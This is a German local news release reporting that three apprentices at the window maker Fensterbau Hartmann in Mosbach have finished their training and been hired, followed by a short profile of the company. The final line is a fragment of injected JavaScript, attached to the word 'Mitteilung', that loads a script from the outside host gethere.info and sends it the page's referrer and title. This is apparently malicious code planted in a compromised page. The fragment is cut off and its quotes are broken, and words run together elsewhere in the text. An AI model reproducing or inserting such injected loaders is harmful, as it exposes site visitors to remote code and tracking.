Fensterbau Hartmann setzt auf Nachwuchs – Berufsausbildung erfolgreich abgeschlossen

Mosbach (nda) – Sabrina Waßmuth, Stephanie Weiserund David Ürün (Zweite, Dritte und Vierter von links) schlossen bei Fensterbau Hartmann erfolgreich ihre Ausbildungen ab. Seit der Geschäftsübernahme des Familienbetriebs vor vier Jahren investiert Inhaber Willi Hartmann (links) in die Ausbildung von Fachkräften. Der 23-jährige Ürün absolvierte eine Ausbildung zum Glaser im Fenster- und Glasfassadenbau, die 19-jährigeWeiser zur Kauffrau für Bürokommunikation und die 23-jährigeWaßmuth zur Kauffrau im Groß- und Außenhandel. Fensterbau Hartmann übernimmt die erfolgreichen Absolventen, um seine Geschäftsbereiche zu vervollständigen. David Ürün unterstützt zukünftig das Team der Produktion, Stephanie Weiser, die als Beste vor der Handwerkskammer abschloss, übernimmtAufgaben im Büro in Mosbach und Sabrina Waßmuthin dem Verkaufsbüro in Offenbach.

Fensterbau Hartmann freut sich über das erfolgreiche Abschneiden der Auszubildenden. „Auszubildende von heute sind Fachkräfte von morgen. Die Investition in Ausbildung hat sich gelohnt. Damit fördern wir auch die Jugend“, sagt der Geschäftsinhaber und setzt schon nächste Woche auf eine neue Auszubildende im Bürobereich.

Das 1972 gegründete Familienunternehmenbeschäftigt zurzeit 40 Mitarbeiter hat eine eigene Produktion und eigene Montage. Kunststofffenster und –türenwerdenseit der Gründung selbst hergestellt. Fensterbau Hartmann vertreibt und montiert weiterhin Holz- und Alu-Bauelemente, Rollläden, Wintergärten, Garagentore, Markisen, sonstige Bauelemente und hat einen eigenen Kundendienst.Neben Mosbach haben sich die Zweigstellen in Hanau, Offenbach und Rodgau etabliert.

Mitteilung2s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;